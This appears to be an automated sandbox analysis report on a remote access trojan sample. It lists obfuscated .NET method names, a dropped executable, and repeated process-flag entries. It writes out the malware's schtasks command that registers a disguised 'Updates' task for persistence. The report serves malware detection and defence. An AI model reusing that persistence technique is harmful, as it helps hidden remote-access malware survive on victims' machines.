Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, osCub496meBYvUl8guH.cs	High entropy of concatenated method names: 'c4sIdMWwXk', 'cYaIFDrx1m', 'TMRIY8937r', 'NCTI0v3JPh', 'YBLIAAjhS8', 'pr0IB1jk7T', 'nASIatSqdE', 'TtRIybIWpe', 'gonIvK43Yb', 'U35INjI0Jd'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, vbEq958PxqW1DAqw3H.cs	High entropy of concatenated method names: 'GrbDmHsK5i', 'lR5D72xwTF', 'GgfDuiqVpD', 'KQmDq5gEjU', 'bCQDnECB4D', 'aaWDZqIPZn', 'M92DXd1tW1', 'OaTDSS3o72', 'pkyDtVBWDC', 'HWXDU8S4G4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, k9bExYlAtUDXGnAaNH.cs	High entropy of concatenated method names: 'APFYcv7Sa', 'Hqy0ZcQlm', 'IHxB6sNpH', 'ox0aM0Ihm', 'LdtvFkLpk', 'MSFNy1rrI', 'bNYXFJZIP2vi8iqWtw', 'ywSe6XrwcchqYnI0TN', 'oVkD36lBn', 'bt9hDfAKF'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, VqLmSH7RgWutvICVLi.cs	High entropy of concatenated method names: 'Dispose', 'qWZ9jHKGhY', 'Rj9lGgQFmo', 'mf833dbNJi', 'Ipb9iEq95P', 'SqW9z1DAqw', 'ProcessDialogKey', 'LH7l6Z55u8', 'nyfl9NBIrR', 'auMllUfRvr'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, NlIU2cH69ja9orLXPY.cs	High entropy of concatenated method names: 'uqNC4ihfJU', 'cU9CLBaYtG', 'Ya1CHDGDfn', 'sdeCWgjndO', 'XnHCG1p6wG', 'pKyCcWyMea', 'byuCJ8smxZ', 'L9tCgKwVoI', 'XynC2wiQKq', 'JhIC3HbUH8'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, nSqupc9RcXrL7kCSMd6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KaShH8is3H', 'Eb3hW590A1', 'NA8hxljjek', 'XxVhwtXOxK', 'lUAhsXuwWK', 'U7ThoKQo6Z', 'tPdhPxUa6X'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Rqu2dhxlCKkB7Q1Rjt.cs	High entropy of concatenated method names: 'ToString', 'h3jr5oynwX', 'UvPrGQVyel', 'kBCrcQEaKO', 'UhYrJ7vYLa', 'UbKrgtsx7A', 'soTr2A0Ktb', 'UlPr3MulmH', 'AhPrOIOMyd', 'gQwrTnjEM0'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, mfRvrEiV6LkHavWeTs.cs	High entropy of concatenated method names: 'nG0I9hyZnM', 'vwyIR4wei4', 'lvtIQLDPwo', 'HMaImurevG', 'AvkI7A8gTy', 'YJ8Iq58naS', 'EooInVCg0e', 'urqDPn5AS2', 'b86D81xdus', 'qTIDjeHRf4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, r0BndIovQnfinH7bOK.cs	High entropy of concatenated method names: 'jrOM8JCQGQ', 'NIVMiBgEmd', 'mVbD6DQHZK', 'Dg6D98fTKU', 'fl4M5rLKJ3', 'R9gMLjUN6w', 'j6WMkCqpsx', 'kaYMHV476h', 'GFMMWgR49r', 'wNRMxchuDL'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, O44hq2QsnAk4t8sf0X.cs	High entropy of concatenated method names: 'zPR9Zy15U5', 'bQX9Xx5oVX', 's7O9toSKle', 'iJW9U8Lk7u', 'gZO9CvdRPU', 'CQK9rh22uq', 'NgAo9PCL2HTB25xchN', 'X5s0ttD1PWP4ndmijG', 'VQw997MlDV', 'Mtx9RXC3Zt'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Ip8Rabzwsc1PuY1SXs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gY9IbXWDQq', 'n5MICsGe6Z', 'dj9Ir75kNx', 'dwKIMSOOky', 'gPPIDvReln', 'wF0II4JhUs', 'H7YIhpq8sK'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, cPUaQKVh22uqMAgfdU.cs	High entropy of concatenated method names: 'njanKy8rKH', 'tI8n750rgr', 'oEsnqXsbwb', 'xL2nZewesL', 'cIRnXc7tmb', 'EWVqs7DFC9', 'fDKqoYSMsY', 'KGLqP5XEiw', 'dxRq86fRi1', 'qCfqj8jo3V'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, gZ55u8jUyfNBIrR6uM.cs	High entropy of concatenated method names: 'KjkDV6c96V', 'HjKDGPh1Iq', 'KcNDc8Rh5h', 'vTSDJBNExn', 'sAnDHqiXOP', 'kQ8DgrWXdS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, dy15U5y9QXx5oVXGvS.cs	High entropy of concatenated method names: 'WhO7HyV4ns', 'PvI7WKOc2O', 'cbx7xF9Vee', 'vrN7wPCDdL', 'YhA7sSZ1hp', 'k2b7ofxYwU', 'eLP7PKkrrm', 'R1Q78xnXmO', 'd0R7j0sSCP', 'WOB7i3UgcU'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, pDACUWT7QZRt25nZDm.cs	High entropy of concatenated method names: 'LZaZdkHNRK', 'oCFZFQWPqM', 'oXZZYQcGrY', 'FXiZ0RYtWL', 'CacZAJDg1R', 'EEgZBFNKRZ', 'vCeZa4YCSu', 'o8cZy2U9gh', 'KX2Zvh9R8G', 'SnSZNKFB14'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Rl2KaIv7OoSKlenJW8.cs	High entropy of concatenated method names: 'hRDu0PaMnH', 'v33uBN4oG7', 'McMuyZ3AuJ', 'QBouv3fNIH', 'YqSuCwAJTi', 'mREurgRsts', 'J1wuMFw8rn', 'orsuDdbftO', 'lBsuILX4GF', 'SWuuhLQj1c'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, y5ode1kjT7vPKqO8Yb.cs	High entropy of concatenated method names: 'LhPby7W7KR', 'HEUbvU6Ltw', 'f4GbVTdXgP', 'XhdbGdt0Mk', 'MGvbJWLS0q', 'AqrbgucZOu', 'QDlb3BsASf', 'SH8bOXUYJ3', 'fGEb4VQEqC', 'xXhb5hQRFM'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, kRTwBN3eOewQaf7vJ4.cs	High entropy of concatenated method names: 'OqLZm3LNM6', 'uGaZu7Z03R', 'VpxZni0sCy', 'uS0nig4Cek', 'DXmnzgMl8Y', 'fbeZ6cvEhK', 'iPYZ9pB11u', 'kfcZls5pug', 'wRRZRKeiaG', 'cfKZQF5uPs'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Pk7u70NwNEuQxuZOvd.cs	High entropy of concatenated method names: 'lncqA0AsVD', 'vRQqa5Hi6r', 'zVgucyxoTd', 'MDeuJrdTY7', 'o5rugTAbZm', 'IsMu2NXFik', 'Tyxu3VjDCa', 'HLhuOkPUj6', 'ueyuT08u8G', 'N4gu4w5set'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	High entropy of concatenated method names: 'teyRKhBNNL', 'T2NRmDitSm', 'AsfR77X8Z9', 'GKDRu57fR6', 'sBpRqMXhc9', 'J2YRnwD9X0', 'OIDRZN5dt5', 'JhXRXDrvlC', 'ASyRSAvvhF', 'AmwRtBc5At'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, aQCZCcJuBKwtsEAMbC.cs	High entropy of concatenated method names: 'ulDn1Lb9ha', 'iLmndhFkU7', 'MEOnYmgrw3', 'zlyn0wB96h', 'jYFnBpKGP2', 'FrunatIgSe', 'w7Unv9m0yB', 'Ik2nNmADC3', 'gQQgpRkOag459yTjPXZ', 'bJsbtCklcwDHSARarJ2'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, osCub496meBYvUl8guH.cs	High entropy of concatenated method names: 'c4sIdMWwXk', 'cYaIFDrx1m', 'TMRIY8937r', 'NCTI0v3JPh', 'YBLIAAjhS8', 'pr0IB1jk7T', 'nASIatSqdE', 'TtRIybIWpe', 'gonIvK43Yb', 'U35INjI0Jd'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, vbEq958PxqW1DAqw3H.cs	High entropy of concatenated method names: 'GrbDmHsK5i', 'lR5D72xwTF', 'GgfDuiqVpD', 'KQmDq5gEjU', 'bCQDnECB4D', 'aaWDZqIPZn', 'M92DXd1tW1', 'OaTDSS3o72', 'pkyDtVBWDC', 'HWXDU8S4G4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, k9bExYlAtUDXGnAaNH.cs	High entropy of concatenated method names: 'APFYcv7Sa', 'Hqy0ZcQlm', 'IHxB6sNpH', 'ox0aM0Ihm', 'LdtvFkLpk', 'MSFNy1rrI', 'bNYXFJZIP2vi8iqWtw', 'ywSe6XrwcchqYnI0TN', 'oVkD36lBn', 'bt9hDfAKF'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, VqLmSH7RgWutvICVLi.cs	High entropy of concatenated method names: 'Dispose', 'qWZ9jHKGhY', 'Rj9lGgQFmo', 'mf833dbNJi', 'Ipb9iEq95P', 'SqW9z1DAqw', 'ProcessDialogKey', 'LH7l6Z55u8', 'nyfl9NBIrR', 'auMllUfRvr'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, NlIU2cH69ja9orLXPY.cs	High entropy of concatenated method names: 'uqNC4ihfJU', 'cU9CLBaYtG', 'Ya1CHDGDfn', 'sdeCWgjndO', 'XnHCG1p6wG', 'pKyCcWyMea', 'byuCJ8smxZ', 'L9tCgKwVoI', 'XynC2wiQKq', 'JhIC3HbUH8'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, nSqupc9RcXrL7kCSMd6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KaShH8is3H', 'Eb3hW590A1', 'NA8hxljjek', 'XxVhwtXOxK', 'lUAhsXuwWK', 'U7ThoKQo6Z', 'tPdhPxUa6X'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Rqu2dhxlCKkB7Q1Rjt.cs	High entropy of concatenated method names: 'ToString', 'h3jr5oynwX', 'UvPrGQVyel', 'kBCrcQEaKO', 'UhYrJ7vYLa', 'UbKrgtsx7A', 'soTr2A0Ktb', 'UlPr3MulmH', 'AhPrOIOMyd', 'gQwrTnjEM0'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, mfRvrEiV6LkHavWeTs.cs	High entropy of concatenated method names: 'nG0I9hyZnM', 'vwyIR4wei4', 'lvtIQLDPwo', 'HMaImurevG', 'AvkI7A8gTy', 'YJ8Iq58naS', 'EooInVCg0e', 'urqDPn5AS2', 'b86D81xdus', 'qTIDjeHRf4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, r0BndIovQnfinH7bOK.cs	High entropy of concatenated method names: 'jrOM8JCQGQ', 'NIVMiBgEmd', 'mVbD6DQHZK', 'Dg6D98fTKU', 'fl4M5rLKJ3', 'R9gMLjUN6w', 'j6WMkCqpsx', 'kaYMHV476h', 'GFMMWgR49r', 'wNRMxchuDL'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, O44hq2QsnAk4t8sf0X.cs	High entropy of concatenated method names: 'zPR9Zy15U5', 'bQX9Xx5oVX', 's7O9toSKle', 'iJW9U8Lk7u', 'gZO9CvdRPU', 'CQK9rh22uq', 'NgAo9PCL2HTB25xchN', 'X5s0ttD1PWP4ndmijG', 'VQw997MlDV', 'Mtx9RXC3Zt'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Ip8Rabzwsc1PuY1SXs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gY9IbXWDQq', 'n5MICsGe6Z', 'dj9Ir75kNx', 'dwKIMSOOky', 'gPPIDvReln', 'wF0II4JhUs', 'H7YIhpq8sK'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, cPUaQKVh22uqMAgfdU.cs	High entropy of concatenated method names: 'njanKy8rKH', 'tI8n750rgr', 'oEsnqXsbwb', 'xL2nZewesL', 'cIRnXc7tmb', 'EWVqs7DFC9', 'fDKqoYSMsY', 'KGLqP5XEiw', 'dxRq86fRi1', 'qCfqj8jo3V'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, gZ55u8jUyfNBIrR6uM.cs	High entropy of concatenated method names: 'KjkDV6c96V', 'HjKDGPh1Iq', 'KcNDc8Rh5h', 'vTSDJBNExn', 'sAnDHqiXOP', 'kQ8DgrWXdS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, dy15U5y9QXx5oVXGvS.cs	High entropy of concatenated method names: 'WhO7HyV4ns', 'PvI7WKOc2O', 'cbx7xF9Vee', 'vrN7wPCDdL', 'YhA7sSZ1hp', 'k2b7ofxYwU', 'eLP7PKkrrm', 'R1Q78xnXmO', 'd0R7j0sSCP', 'WOB7i3UgcU'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, pDACUWT7QZRt25nZDm.cs	High entropy of concatenated method names: 'LZaZdkHNRK', 'oCFZFQWPqM', 'oXZZYQcGrY', 'FXiZ0RYtWL', 'CacZAJDg1R', 'EEgZBFNKRZ', 'vCeZa4YCSu', 'o8cZy2U9gh', 'KX2Zvh9R8G', 'SnSZNKFB14'

Drops PE files

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File created: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
